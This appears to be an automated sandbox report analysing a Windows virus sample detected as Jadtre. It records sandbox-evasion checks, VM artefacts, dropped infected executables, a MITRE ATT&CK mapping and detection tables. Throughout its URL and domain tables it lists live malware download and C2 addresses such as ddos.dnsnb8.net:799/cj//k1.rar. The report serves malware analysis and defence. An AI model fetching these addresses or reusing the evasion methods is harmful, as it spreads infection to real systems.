                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-17852
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess | graph_0-17833
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_2-1312
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_2-1053
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API coverage: 5.5 %
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00701718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00701754h | 2_2_00701718
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_007029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, | 2_2_007029E2
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_00702B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, | 2_2_00702B8C
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00401100 GetSystemInfo,ExitProcess, | 0_2_00401100
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnj
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 7Y18r(193).exe, 00000000.00000002.1511509261.0000000000885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17837
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17840
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17691
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17678
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17858
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17851
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-17855
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | API call chain: ExitProcess graph end node | graph_0-18853
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | API call chain: ExitProcess graph end node | graph_2-1028
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00412180
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00401240 mov eax, dword ptr fs:[00000030h] | 0_2_00401240
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00412070 mov eax, dword ptr fs:[00000030h] | 0_2_00412070
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_007BA044 mov eax, dword ptr fs:[00000030h] | 0_2_007BA044
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_008914A7 mov eax, dword ptr fs:[00000030h] | 0_2_008914A7
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_008A22D7 mov eax, dword ptr fs:[00000030h] | 0_2_008A22D7
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00890D90 mov eax, dword ptr fs:[00000030h] | 0_2_00890D90
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_0089092B mov eax, dword ptr fs:[00000030h] | 0_2_0089092B
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_008E5654 push dword ptr fs:[00000030h] | 0_2_008E5654
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_004107D0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, | 0_2_004107D0
                  Source: SciTE.exe.2.dr | Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00410360 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00410360
                  Source: C:\Users\user\Desktop\7Y18r(193).exe | Code function: 0_2_00410790 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00410790
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exe | Code function: 2_2_0070139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, | 2_2_0070139F
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: Process Memory Space: WuiXLS.exe PID: 7496, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara match | File source: 0.3.7Y18r(193).exe.2430000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.890e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.7Y18r(193).exe.2430000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 7Y18r(193).exe PID: 7472, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: Process Memory Space: WuiXLS.exe PID: 7496, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara match | File source: 0.3.7Y18r(193).exe.2430000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.890e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.7Y18r(193).exe.2430000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: 7Y18r(193).exe PID: 7472, type: MEMORYSTR
Mitre Att&ck Matrix (one line per tactic; the digits shown in the report in front of a technique are kept as they appear)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 22 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 Access Token Manipulation; 2 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; Indicator Removal from Tools
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 11 System Time Discovery; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 3 File and Directory Discovery; 14 System Information Discovery
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 11 Non-Standard Port; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1482727 | Sample: 7Y18r(193).exe | Startdate: 26/07/2024 | Architecture: WINDOWS | Score: 100
• Start
  • DNS/IP Info: ddos.dnsnb8.net
  • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 13 other signatures
  • Process: 7Y18r(193).exe (started)
    • Created File: C:\Users\user\AppData\Local\Temp\WuiXLS.exe, PE32 (dropped)
    • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Found evasive API chain (may stop execution after checking locale)
    • Process: WuiXLS.exe (started)
      • DNS/IP Info: ddos.dnsnb8.net, 44.221.84.105, 49705, 799, AMAZON-AESUS, United States
      • Created Files: C:\Program Files\7-Zip\Uninstall.exe, PE32 (dropped); C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 (dropped); C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS (dropped)
      • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures
      • Process: WerFault.exe (started)
    • Process: WerFault.exe (started)
      • Created File: C:\ProgramData\Microsoft\...\Report.wer, Unicode (dropped)

Source | Detection | Scanner | Label
7Y18r(193).exe | 96% | ReversingLabs | Win32.Virus.Jadtre
7Y18r(193).exe | 93% | Virustotal |
7Y18r(193).exe | 100% | Avira | W32/Jadtre.B
7Y18r(193).exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 100% | Avira | TR/Dldr.Small.Z.haljq
C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 92% | ReversingLabs | Win32.Trojan.Madeba
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
https://www.smartsharesystems.com/Morten | 0% | URL Reputation | safe
http://www.scintilla.org/scite.rng | 0% | URL Reputation | safe
http://www.develop.com | 0% | URL Reputation | safe
http://www.lua.org | 0% | URL Reputation | safe
http://www.rftp.comJosiah | 0% | URL Reputation | safe
http://www.activestate.com | 0% | URL Reputation | safe
http://ddos.dnsnb8.net/ | 100% | URL Reputation | malware
http://www.activestate.comHolger | 0% | URL Reputation | safe
http://ddos.dnsnb8.net:799/cj//k1.rar | 100% | URL Reputation | malware
http://www.spaceblue.com | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://www.baanboard.com | 0% | URL Reputation | safe
http://www.rftp.com | 0% | URL Reputation | safe
http://www.develop.comDeepak | 0% | URL Reputation | safe
http://www.baanboard.comBrendon | 0% | URL Reputation | safe
https://www.smartsharesystems.com/ | 0% | URL Reputation | safe
http://www.scintilla.org | 0% | URL Reputation | safe
http://www.spaceblue.comMathias | 0% | URL Reputation | safe
http://bernardofata.icu/40d570f44e84a454.php | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k1.rarq | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k1.rarp | 100% | Avira URL Cloud | phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | 0% | Avira URL Cloud | safe
http://ddos.dnsnb8.net:799/cj//k1.rarH | 100% | Avira URL Cloud | phishing
http://ddos.dnsnb8.net:799/cj//k1.rarn.= | 100% | Avira URL Cloud | phishing
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ddos.dnsnb8.net | 44.221.84.105 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://bernardofata.icu/40d570f44e84a454.php | true | Avira URL Cloud: malware | unknown
http://ddos.dnsnb8.net:799/cj//k1.rar | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.smartsharesystems.com/Morten | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.scintilla.org/scite.rng | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.develop.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.lua.org | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.rftp.comJosiah | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.activestate.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net/ | WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.activestate.comHolger | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | WuiXLS.exe, 00000002.00000003.1394029719.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
http://ddos.dnsnb8.net:799/cj//k1.rarq | WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.spaceblue.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net:799/cj//k1.rarp | WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | URL Reputation: safe | unknown
http://www.baanboard.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.rftp.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net:799/cj//k1.rarn.= | WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.develop.comDeepak | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net:799/cj//k1.rarH | WuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.baanboard.comBrendon | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://www.smartsharesystems.com/ | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.scintilla.org | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.spaceblue.comMathias | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
44.221.84.105 | ddos.dnsnb8.net | United States | 14618 | AMAZON-AESUS | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1482727
                    Start date and time:2024-07-26 02:50:35 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:7Y18r(193).exe
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winEXE@5/13@4/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 72
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
